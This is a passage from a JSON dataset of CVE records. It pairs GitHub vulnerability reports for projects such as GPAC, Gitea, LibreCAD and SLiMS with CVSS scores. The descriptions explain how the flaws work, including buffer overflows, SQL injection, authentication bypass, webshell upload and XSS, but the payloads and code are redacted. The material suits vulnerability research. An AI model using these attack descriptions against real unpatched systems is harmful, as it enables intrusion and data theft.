  75031. "description": "infinite loop in gf_get_bit_size\uff08\uff09. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! APITAG ] I looked for a similar issue and couldn't find any. [ Yes] I tried with the latest version of GPAC. Installers available at URLTAG [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG Version: ERRORTAG System information Ubuntu NUMBERTAG LTS, gcc version NUMBERTAG APITAG NUMBERTAG ubuntu NUMBERTAG command: APITAG Result APITAG GDB information CODETAG",
  75032. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75033. "severity": "MEDIUM",
  75034. "baseScore": 5.5,
  75035. "impactScore": 3.6,
  75036. "exploitabilityScore": 1.8
  75037. },
  75038. {
  75039. "CVE_ID": "CVE-2021-45325",
  75040. "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/4973",
  75041. "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/4973",
  75042. "Repo_new": "go-gitea/gitea",
  75043. "Issue_Created_At": "2018-09-21T19:40:56Z",
  75044. "description": "server side request forgery (SSRF) vulnerability in APITAG sign in. Another SSRF issue ( the others reported on Gogs repository ). Affected URL: APITAG Payload as APITAG URI: APITAG Response: APITAG It's less severe than the one in the webhooks because in the case of a web server it doesn't show the full HTTP response body and headers, just that the APITAG isn't found. It still shows servers signatures for non HTTP servers, for example for SSH, showed above. URLTAG",
  75045. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  75046. "severity": "HIGH",
  75047. "baseScore": 7.5,
  75048. "impactScore": 3.6,
  75049. "exploitabilityScore": 3.9
  75050. },
  75051. {
  75052. "CVE_ID": "CVE-2021-45328",
  75053. "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/4332",
  75054. "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/4332",
  75055. "Repo_new": "go-gitea/gitea",
  75056. "Issue_Created_At": "2018-06-28T14:02:25Z",
  75057. "description": "Open Redirect vulnerability. APITAG Gitea version (or commit ref): any Git version: not relevant Operating system: not relevant Database (use APITAG ): [ ] APITAG [ ] APITAG [ ] MSSQL [ ] APITAG Can you reproduce the bug at FILETAG [x] Yes (provide example URL) [ ] No [ ] Not relevant Log gist: not relevant Description As said in NUMBERTAG PR NUMBERTAG doesn't mitigate the issue because there are still Open Redirect issues in other parts of Gitea, thus it is possible to redirect the login to an internal link where the issue is not mitigated. See the following url: FILETAG or shorter: FILETAG Screenshots None APITAG",
  75058. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  75059. "severity": "MEDIUM",
  75060. "baseScore": 6.1,
  75061. "impactScore": 2.7,
  75062. "exploitabilityScore": 2.8
  75063. },
  75064. {
  75065. "CVE_ID": "CVE-2021-45330",
  75066. "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/4336",
  75067. "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/4336",
  75068. "Repo_new": "go-gitea/gitea",
  75069. "Issue_Created_At": "2018-06-28T15:28:30Z",
  75070. "description": "Log out only deletes cookies. APITAG Gitea version (or commit ref): any Git version: not relevant Operating system: not relevant Database (use APITAG ): [ ] APITAG [ ] APITAG [ ] MSSQL [ ] APITAG Can you reproduce the bug at FILETAG [ ] Yes (provide example URL) [ ] No [x] Not relevant Log gist: Description If a user logs out, the session / cookies don't expire, allowing an attacker to remain logged in. In fact Gitea logs out users by deleting cookies on the client side, but they are still valid server side. Getting the cookies requires a MITM attack, so it isn't so easy to exploit. Issue already reported by mail two months ago but never got an answer. Screenshots None APITAG",
  75071. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75072. "severity": "CRITICAL",
  75073. "baseScore": 9.8,
  75074. "impactScore": 5.9,
  75075. "exploitabilityScore": 3.9
  75076. },
  75077. {
  75078. "CVE_ID": "CVE-2021-45340",
  75079. "Issue_Url_old": "https://github.com/libsixel/libsixel/issues/51",
  75080. "Issue_Url_new": "https://github.com/libsixel/libsixel/issues/51",
  75081. "Repo_new": "libsixel/libsixel",
  75082. "Issue_Created_At": "2021-12-14T22:08:42Z",
  75083. "description": "NULL pointer dereference in stb_image.h. This is a duplicate report of issue NUMBERTAG URLTAG in the original project. I'm not sure where best to report this, but it affects both projects. Vulnerable versions saitoha/libsixel at the latest APITAG commit libsixel/libsixel at the latest APITAG commit Steps to reproduce APITAG Input file (a malformed PICT format image) is FILETAG Cause Segmentation fault in APITAG at APITAG : CODETAG The src pointer is NULL , as passed in from APITAG . The source of the NULL pointer is the malloc at line APITAG : APITAG whose output is never checked for NULL . The x and y dimensions NUMBERTAG are read directly from the input file, and they pass the check in APITAG which only checks for integer overflow. The total size of the allocated buffer is APITAG and allocation fails. Impact Denial of service is the only obvious impact. Mitigation APITAG starting at version NUMBERTAG commit APITAG include a check for this condition. libsixel should be brought up to date with this version if possible. If not, backport the check URLTAG as well as similar error checks for other malloc calls.",
  75084. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75085. "severity": "MEDIUM",
  75086. "baseScore": 6.5,
  75087. "impactScore": 3.6,
  75088. "exploitabilityScore": 2.8
  75089. },
  75090. {
  75091. "CVE_ID": "CVE-2021-45341",
  75092. "Issue_Url_old": "https://github.com/LibreCAD/LibreCAD/issues/1462",
  75093. "Issue_Url_new": "https://github.com/librecad/librecad/issues/1462",
  75094. "Repo_new": "librecad/librecad",
  75095. "Issue_Created_At": "2021-12-18T19:01:27Z",
  75096. "description": "Remote Code Execution vulnerability in APITAG NUMBERTAG rc3. Vulnerable Products APITAG NUMBERTAG rc3 and older Jw_cad NUMBERTAG a and older Steps to reproduce or sample file NUMBERTAG Start APITAG NUMBERTAG rc3 in a debugger NUMBERTAG APITAG NUMBERTAG Unzip and open the attached FILETAG NUMBERTAG Observe APITAG crash, with APITAG (AAAA) Screenshot: FILETAG Cause The APITAG entity deserialization at APITAG is vulnerable to a stack buffer overflow. APITAG declared in APITAG on line NUMBERTAG URLTAG is of fixed size NUMBERTAG Some varieties of APITAG provide their own size, e.g. APITAG on line NUMBERTAG URLTAG and no bounds checking is performed. This allows an attacker to overflow buf and overwrite other stack variables, including the return address. The attached APITAG file is tuned to trigger this behavior in the latest windows release of APITAG but the same bug is also present in older versions and on other platforms. Impact An attacker can craft a JW CAD input file and thereby gain control over execution flow (EIP controlled directly). This allows an attacker to run arbitrary code on the system running APITAG with the privileges of the current user. Proposed Mitigation NUMBERTAG Perform bounds checking in APITAG , and refuse to load the file if it would overflow buf NUMBERTAG Enable stack smashing protection in the windows build of APITAG Operating System and APITAG version info Version NUMBERTAG rc3 Compiler: GNU GCC NUMBERTAG Compiled on: No NUMBERTAG Qt Version NUMBERTAG Boost Version NUMBERTAG System: Windows NUMBERTAG",
  75097. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  75098. "severity": "HIGH",
  75099. "baseScore": 8.8,
  75100. "impactScore": 5.9,
  75101. "exploitabilityScore": 2.8
  75102. },
  75103. {
  75104. "CVE_ID": "CVE-2021-45342",
  75105. "Issue_Url_old": "https://github.com/LibreCAD/LibreCAD/issues/1464",
  75106. "Issue_Url_new": "https://github.com/librecad/librecad/issues/1464",
  75107. "Repo_new": "librecad/librecad",
  75108. "Issue_Created_At": "2021-12-18T22:48:34Z",
  75109. "description": "Remote Code Execution vulnerability in APITAG NUMBERTAG rc3 (JWW APITAG Vulnerable Products APITAG NUMBERTAG rc3 and older Steps to reproduce or sample file NUMBERTAG Start APITAG NUMBERTAG in a debugger NUMBERTAG APITAG NUMBERTAG Unzip and open the FILETAG NUMBERTAG Observe APITAG crash, with APITAG (AAAA) Screenshot: FILETAG Cause The APITAG entity deserialization in APITAG is vulnerable to a stack buffer overflow. APITAG declared in APITAG on line NUMBERTAG URLTAG is of fixed size NUMBERTAG One variety of APITAG provides its own size field, as seen on line NUMBERTAG URLTAG and no bounds checking is performed. This allows an attacker to overflow buf and overwrite other stack variables, including the return address. The attached APITAG file is tuned to trigger this behavior in the latest windows release of APITAG but the same bug is also present in older versions and on other platforms. Note : This is similar to, but distinct from issue NUMBERTAG Impact An attacker can craft a JW CAD input file and thereby gain control over execution flow (EIP controlled directly). This allows an attacker to run arbitrary code on the system running APITAG with the privileges of the current user. Proposed Mitigation NUMBERTAG Perform bounds checking in APITAG , and refuse to load more data to buf than actually supported NUMBERTAG Enable stack smashing protection in the windows build of APITAG Operating System and APITAG version info Version NUMBERTAG rc3 Compiler: GNU GCC NUMBERTAG Compiled on: No NUMBERTAG Qt Version NUMBERTAG Boost Version NUMBERTAG System: Windows NUMBERTAG",
  75110. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  75111. "severity": "HIGH",
  75112. "baseScore": 7.8,
  75113. "impactScore": 5.9,
  75114. "exploitabilityScore": 1.8
  75115. },
  75116. {
  75117. "CVE_ID": "CVE-2021-45343",
  75118. "Issue_Url_old": "https://github.com/LibreCAD/LibreCAD/issues/1468",
  75119. "Issue_Url_new": "https://github.com/librecad/librecad/issues/1468",
  75120. "Repo_new": "librecad/librecad",
  75121. "Issue_Created_At": "2021-12-19T17:00:48Z",
  75122. "description": "NULL pointer dereference in DXF parser, HATCH code NUMBERTAG Steps to reproduce or sample file NUMBERTAG Unzip and load the FILETAG in APITAG NUMBERTAG rc3 Cause The APITAG APITAG is written to when loading a HATCH entity with code NUMBERTAG If this occurs before a code NUMBERTAG the pointer is still NULL , leading to a crash. Impact Denial of service. Proposed Mitigation Ensure that APITAG is not NULL before dereferencing at APITAG Operating System and APITAG version info Version NUMBERTAG rc3 Compiler: GNU GCC NUMBERTAG Compiled on: No NUMBERTAG Qt Version NUMBERTAG Boost Version NUMBERTAG System: Windows NUMBERTAG",
  75123. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75124. "severity": "MEDIUM",
  75125. "baseScore": 5.5,
  75126. "impactScore": 3.6,
  75127. "exploitabilityScore": 1.8
  75128. },
  75129. {
  75130. "CVE_ID": "CVE-2021-45347",
  75131. "Issue_Url_old": "https://github.com/forget-code/zzcms/issues/2",
  75132. "Issue_Url_new": "https://github.com/forget-code/zzcms/issues/2",
  75133. "Repo_new": "forget-code/zzcms",
  75134. "Issue_Created_At": "2021-12-15T03:07:23Z",
  75135. "description": "Authentication can be bypassed by changing the user name in the cookie to use any password. If the user name in the cookie is changed to an existing user, any password can be used to bypass authentication FILETAG FILETAG",
  75136. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  75137. "severity": "HIGH",
  75138. "baseScore": 7.5,
  75139. "impactScore": 3.6,
  75140. "exploitabilityScore": 3.9
  75141. },
  75142. {
  75143. "CVE_ID": "CVE-2021-45364",
  75144. "Issue_Url_old": "https://github.com/Stakcery/Web-Security/issues/2",
  75145. "Issue_Url_new": "https://github.com/y4tacker/web-security/issues/2",
  75146. "Repo_new": "y4tacker/web-security",
  75147. "Issue_Created_At": "2021-12-16T11:50:04Z",
  75148. "description": "FILETAG look at APITAG It allows us to pass in any parameter and has no filter FILETAG FILETAG After that we just need to find a place to upload the file we visit APITAG \uff0cand upload APITAG with APITAG in APITAG look at function APITAG FILETAG Just the postfix checksum from the configuration file we just modified\uff0cI think you should add a separate blacklist that doesn't allow php files to be uploaded and then click upload we find , successfully upload! FILETAG you must know what it is. FILETAG then we exploit it. FILETAG",
  75149. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75150. "severity": "CRITICAL",
  75151. "baseScore": 9.8,
  75152. "impactScore": 5.9,
  75153. "exploitabilityScore": 3.9
  75154. },
  75155. {
  75156. "CVE_ID": "CVE-2021-45380",
  75157. "Issue_Url_old": "https://github.com/source-trace/appcms/issues/8",
  75158. "Issue_Url_new": "https://github.com/source-trace/appcms/issues/8",
  75159. "Repo_new": "source-trace/appcms",
  75160. "Issue_Created_At": "2021-12-16T01:16:21Z",
  75161. "description": "XSS injection vulnerability exists in PATHTAG FILETAG APITAG $_GET FILETAG",
  75162. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  75163. "severity": "MEDIUM",
  75164. "baseScore": 6.1,
  75165. "impactScore": 2.7,
  75166. "exploitabilityScore": 2.8
  75167. },
  75168. {
  75169. "CVE_ID": "CVE-2021-45385",
  75170. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/47",
  75171. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/47",
  75172. "Repo_new": "rockcarry/ffjpeg",
  75173. "Issue_Created_At": "2021-12-16T03:01:01Z",
  75174. "description": "SEGV in APITAG at APITAG This segmentation fault error occurs because in APITAG , when bmp's size is out of range, it returns without assigning a memory buffer to APITAG and does not exit the program. So the program crashes when it tries to access the APITAG , which is an invalid memory address. Test Environment Ubuntu NUMBERTAG bit ffjpeg (master d5cfd NUMBERTAG How to trigger APITAG POC FILE URLTAG Details gdb report CODETAG",
  75175. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75176. "severity": "MEDIUM",
  75177. "baseScore": 6.5,
  75178. "impactScore": 3.6,
  75179. "exploitabilityScore": 2.8
  75180. },
  75181. {
  75182. "CVE_ID": "CVE-2021-45386",
  75183. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/687",
  75184. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/687",
  75185. "Repo_new": "appneta/tcpreplay",
  75186. "Issue_Created_At": "2021-12-17T07:24:34Z",
  75187. "description": "Bug] Two reachable assertions in APITAG and APITAG Describe the bug There are two reachable assertions in APITAG APITAG and APITAG APITAG when the user uses tcpprep to open a crafted pcap file. To Reproduce Steps to reproduce the behavior NUMBERTAG get the tcpreplay source code (master NUMBERTAG ca NUMBERTAG e3) and build it NUMBERTAG run the cmd: APITAG The poc file could be downloaded in here: [POC_add_tree_ip NUMBERTAG URLTAG POC_add_tree_ip NUMBERTAG URLTAG Expected behavior Program reports assertion failure and is terminated. Screenshots GDB report of POC_add_tree_ip NUMBERTAG ERRORTAG GDB report of POC_add_tree_ip NUMBERTAG ERRORTAG System (please complete the following information): OS: Ubuntu OS version NUMBERTAG Tcpreplay Version NUMBERTAG master NUMBERTAG ca NUMBERTAG e3)",
  75188. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75189. "severity": "MEDIUM",
  75190. "baseScore": 5.5,
  75191. "impactScore": 3.6,
  75192. "exploitabilityScore": 1.8
  75193. },
  75194. {
  75195. "CVE_ID": "CVE-2021-45429",
  75196. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/1616",
  75197. "Issue_Url_new": "https://github.com/virustotal/yara/issues/1616",
  75198. "Repo_new": "virustotal/yara",
  75199. "Issue_Created_At": "2021-12-15T18:01:26Z",
  75200. "description": "Possible insecure pointer conversion in APITAG leading to global buffer overflow. version: master (commit URLTAG command: yara $FILE strings APITAG is a file that can contain any string, such as \"hello\". Here is the trace reported by ASAN: ERRORTAG Commit APITAG introduced a configuration case called APITAG , which will treat the APITAG pointer as a APITAG pointer NUMBERTAG bit). The dereference operation after this will read NUMBERTAG bits from src. URLTAG Note that, in cli/yara.c, a pointer to the NUMBERTAG bit integer APITAG is passed to APITAG . As a result, APITAG will read NUMBERTAG bits from a NUMBERTAG bit variable. This caused the ERROR reported by ASAN. URLTAG URLTAG A potential damage of this is that an attacker who obtains control of APITAG 's next NUMBERTAG bytes in the memory can further set the higher NUMBERTAG bits of APITAG to arbitrary values and launch exhaustive attacks.",
  75201. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75202. "severity": "MEDIUM",
  75203. "baseScore": 5.5,
  75204. "impactScore": 3.6,
  75205. "exploitabilityScore": 1.8
  75206. },
  75207. {
  75208. "CVE_ID": "CVE-2021-45459",
  75209. "Issue_Url_old": "https://github.com/dwisiswant0/advisory/issues/4",
  75210. "Issue_Url_new": "https://github.com/dwisiswant0/advisory/issues/4",
  75211. "Repo_new": "dwisiswant0/advisory",
  75212. "Issue_Created_At": "2021-08-05T09:12:53Z",
  75213. "description": "OS Command Injection in huntr NUMBERTAG e NUMBERTAG d NUMBERTAG d NUMBERTAG cb NUMBERTAG d0b cb7c NUMBERTAG ac NUMBERTAG Description _TBD_ CVE ID : _N/A_ References _URL_",
  75214. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75215. "severity": "CRITICAL",
  75216. "baseScore": 9.8,
  75217. "impactScore": 5.9,
  75218. "exploitabilityScore": 3.9
  75219. },
  75220. {
  75221. "CVE_ID": "CVE-2021-45746",
  75222. "Issue_Url_old": "https://github.com/WeBankPartners/wecube-platform/issues/2297",
  75223. "Issue_Url_new": "https://github.com/webankpartners/wecube-platform/issues/2297",
  75224. "Repo_new": "webankpartners/wecube-platform",
  75225. "Issue_Created_At": "2021-11-23T08:43:10Z",
  75226. "description": "Path Manipulation. URLTAG URLTAG URLTAG We found 'file' may be contaminated on line NUMBERTAG of APITAG of unfiltered data in selection of requested application file path could lead to sensitive data disclosure and potential theft of proprietary business logic. It will affect on line NUMBERTAG of APITAG",
  75227. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  75228. "severity": "HIGH",
  75229. "baseScore": 7.5,
  75230. "impactScore": 3.6,
  75231. "exploitabilityScore": 3.9
  75232. },
  75233. {
  75234. "CVE_ID": "CVE-2021-45760",
  75235. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1966",
  75236. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1966",
  75237. "Repo_new": "gpac/gpac",
  75238. "Issue_Created_At": "2021-12-10T11:00:37Z",
  75239. "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
  75240. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75241. "severity": "MEDIUM",
  75242. "baseScore": 5.5,
  75243. "impactScore": 3.6,
  75244. "exploitabilityScore": 1.8
  75245. },
  75246. {
  75247. "CVE_ID": "CVE-2021-45761",
  75248. "Issue_Url_old": "https://github.com/Boyan-MILANOV/ropium/issues/32",
  75249. "Issue_Url_new": "https://github.com/boyan-milanov/ropium/issues/32",
  75250. "Repo_new": "boyan-milanov/ropium",
  75251. "Issue_Created_At": "2020-07-02T10:19:24Z",
  75252. "description": "Invalid memory address dereference in APITAG An issue was discovered in APITAG NUMBERTAG An invalid memory address dereference was discovered in APITAG The vulnerability causes a segmentation fault and application crash. POC CODETAG CODETAG",
  75253. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  75254. "severity": "HIGH",
  75255. "baseScore": 7.5,
  75256. "impactScore": 3.6,
  75257. "exploitabilityScore": 3.9
  75258. },
  75259. {
  75260. "CVE_ID": "CVE-2021-45762",
  75261. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1978",
  75262. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1978",
  75263. "Repo_new": "gpac/gpac",
  75264. "Issue_Created_At": "2021-12-11T09:10:17Z",
  75265. "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
  75266. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75267. "severity": "MEDIUM",
  75268. "baseScore": 5.5,
  75269. "impactScore": 3.6,
  75270. "exploitabilityScore": 1.8
  75271. },
  75272. {
  75273. "CVE_ID": "CVE-2021-45763",
  75274. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1974",
  75275. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1974",
  75276. "Repo_new": "gpac/gpac",
  75277. "Issue_Created_At": "2021-12-11T01:02:59Z",
  75278. "description": "Invalid call in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG APITAG CODETAG",
  75279. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75280. "severity": "MEDIUM",
  75281. "baseScore": 5.5,
  75282. "impactScore": 3.6,
  75283. "exploitabilityScore": 1.8
  75284. },
  75285. {
  75286. "CVE_ID": "CVE-2021-45764",
  75287. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1971",
  75288. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1971",
  75289. "Repo_new": "gpac/gpac",
  75290. "Issue_Created_At": "2021-12-10T15:59:06Z",
  75291. "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
  75292. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75293. "severity": "MEDIUM",
  75294. "baseScore": 5.5,
  75295. "impactScore": 3.6,
  75296. "exploitabilityScore": 1.8
  75297. },
  75298. {
  75299. "CVE_ID": "CVE-2021-45767",
  75300. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1982",
  75301. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1982",
  75302. "Repo_new": "gpac/gpac",
  75303. "Issue_Created_At": "2021-12-14T02:23:22Z",
  75304. "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG CODETAG Result The result is omitted here. gdb The gdb result is omitted here.",
  75305. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75306. "severity": "MEDIUM",
  75307. "baseScore": 5.5,
  75308. "impactScore": 3.6,
  75309. "exploitabilityScore": 1.8
  75310. },
  75311. {
  75312. "CVE_ID": "CVE-2021-45769",
  75313. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/368",
  75314. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/368",
  75315. "Repo_new": "mz-automation/libiec61850",
  75316. "Issue_Created_At": "2021-12-23T00:53:55Z",
  75317. "description": "NULL Pointer Dereference in APITAG NULL Pointer Dereference in APITAG Description A NULL Pointer Dereference was discovered in APITAG at PATHTAG The vulnerability causes a segmentation fault and application crash. version NUMBERTAG eeb6f0 System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz Proof of Concept poc APITAG command: APITAG Result ERRORTAG gdb ERRORTAG",
  75318. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  75319. "severity": "HIGH",
  75320. "baseScore": 7.5,
  75321. "impactScore": 3.6,
  75322. "exploitabilityScore": 3.9
  75323. },
  75324. {
  75325. "CVE_ID": "CVE-2021-45773",
  75326. "Issue_Url_old": "https://github.com/mz-automation/lib60870/issues/100",
  75327. "Issue_Url_new": "https://github.com/mz-automation/lib60870/issues/100",
  75328. "Repo_new": "mz-automation/lib60870",
  75329. "Issue_Created_At": "2021-12-23T06:01:26Z",
  75330. "description": "NULL Pointer Dereference in APITAG NULL Pointer Dereference in APITAG Description A NULL Pointer Dereference was discovered in APITAG at PATHTAG The vulnerability causes a segmentation fault and application crash. If the APITAG is NULL, APITAG will crash. Should there be a check? version NUMBERTAG d5e NUMBERTAG e System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz gdb ERRORTAG ERRORTAG",
  75331. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  75332. "severity": "HIGH",
  75333. "baseScore": 7.5,
  75334. "impactScore": 3.6,
  75335. "exploitabilityScore": 3.9
  75336. },
  75337. {
  75338. "CVE_ID": "CVE-2021-45786",
  75339. "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/747",
  75340. "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/747",
  75341. "Repo_new": "magicblack/maccms10",
  75342. "Issue_Created_At": "2021-11-12T07:46:08Z",
  75343. "description": "There is an arbitrary user login vulnerability. View the login code\uff0c FILETAG In addition to logging in through the user name and password, you can also log in through the \"col\" and \"openid\" parameters, but these two parameters are completely controllable. That causes an arbitrary user login vulnerability. poc\uff1a APITAG Local test results\uff1a APITAG APITAG",
  75344. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75345. "severity": "CRITICAL",
  75346. "baseScore": 9.8,
  75347. "impactScore": 5.9,
  75348. "exploitabilityScore": 3.9
  75349. },
  75350. {
  75351. "CVE_ID": "CVE-2021-45787",
  75352. "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/746",
  75353. "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/746",
  75354. "Repo_new": "magicblack/maccms10",
  75355. "Issue_Created_At": "2021-11-11T07:08:11Z",
  75356. "description": "\u7f51\u7ad9\u540e\u53f0\u5b58\u6dfb\u52a0\u89c6\u9891\u5904\u5b58\u5728\u5b58\u50a8\u578bXSS\u6f0f\u6d1e. APITAG FILETAG \u63d2\u5165\u7684xss\u4ee3\u7801\u4e5f\u4f1a\u5728\u524d\u53f0\u88ab\u6267\u884c FILETAG APITAG \u53e6\u5916\uff0c\u540e\u53f0\u6dfb\u52a0\u6587\u7ae0\u5904\u4e5f\u6709\u76f8\u540c\u95ee\u9898",
  75357. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  75358. "severity": "MEDIUM",
  75359. "baseScore": 5.4,
  75360. "impactScore": 2.7,
  75361. "exploitabilityScore": 2.3
  75362. },
  75363. {
  75364. "CVE_ID": "CVE-2021-45791",
  75365. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/200",
  75366. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/200",
  75367. "Repo_new": "slims/slims8_akasia",
  75368. "Issue_Created_At": "2021-12-21T07:05:29Z",
  75369. "description": "Security Bugs] Multiple Sql Injection. Hello, I found some serious bugs in Slims8 Akasia NUMBERTAG latest version). First of all, there is a SQL injection bug. This injection exists in multiple files, and the file where the search keyword $_GET['dir'] is located all has SQL injection. url:[ URLTAG url CODETAG '.urldecode($_GET $_fld_sort]).' CODETAG You have escaped the dir string. But in fact it just appends a backslash \\ before', \"or \\. Reference from PHP mysql_real_escape_string Therefore, if my GET variable dir does not contain these characters, sql injection will be triggered. SQL injection demonstration APITAG SQL injection demonstration APITAG Example: [ URLTAG url APITAG APITAG List some pages with SQL injection: CODETAG",
  75370. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  75371. "severity": "HIGH",
  75372. "baseScore": 8.8,
  75373. "impactScore": 5.9,
  75374. "exploitabilityScore": 2.8
  75375. },
  75376. {
  75377. "CVE_ID": "CVE-2021-45792",
  75378. "Issue_Url_old": "https://github.com/slims/slims9_bulian/issues/122",
  75379. "Issue_Url_new": "https://github.com/slims/slims9_bulian/issues/122",
  75380. "Repo_new": "slims/slims9_bulian",
  75381. "Issue_Created_At": "2021-12-22T08:39:34Z",
  75382. "description": "APITAG APITAG cross site scripting attacks\uff08xss\uff09. Describe the bug Stored xss exists in Custom Field Editor in PATHTAG file. There is no effective defense against the NOTE field, leading to cross site scripting attacks. To Reproduce Steps to reproduce the behavior: Stored xss exists in Custom Field Editor in PATHTAG file. There is no effective defense against the NOTE field, leading to cross site scripting attacks. Administrator login \"system\" add new \"field> fill in cross site scripting in the NOTE field APITAG It will take effect after saving. Expected behavior You can insert js scripts to attack. Screenshots APITAG APITAG Desktop : OS: APITAG M1] Browser APITAG Version APITAG",
  75383. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  75384. "severity": "MEDIUM",
  75385. "baseScore": 4.8,
  75386. "impactScore": 2.7,
  75387. "exploitabilityScore": 1.7
  75388. },
  75389. {
  75390. "CVE_ID": "CVE-2021-45793",
  75391. "Issue_Url_old": "https://github.com/slims/slims9_bulian/issues/123",
  75392. "Issue_Url_new": "https://github.com/slims/slims9_bulian/issues/123",
  75393. "Repo_new": "slims/slims9_bulian",
  75394. "Issue_Created_At": "2021-12-22T09:49:53Z",
  75395. "description": "APITAG Bugs] Sql Injection. SQL injection exists in the FILETAG file. There is no effective defense against the comment field, leading to SQL injection attacks. Ordinary user login \"find a book\" SQL injection attack in the comments (example: APITAG ) APITAG APITAG CODETAG CODETAG",
  75396. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  75397. "severity": "HIGH",
  75398. "baseScore": 7.5,
  75399. "impactScore": 3.6,
  75400. "exploitabilityScore": 3.9
  75401. },
  75402. {
  75403. "CVE_ID": "CVE-2021-45794",
  75404. "Issue_Url_old": "https://github.com/slims/slims9_bulian/issues/124",
  75405. "Issue_Url_new": "https://github.com/slims/slims9_bulian/issues/124",
  75406. "Repo_new": "slims/slims9_bulian",
  75407. "Issue_Created_At": "2021-12-22T14:29:35Z",
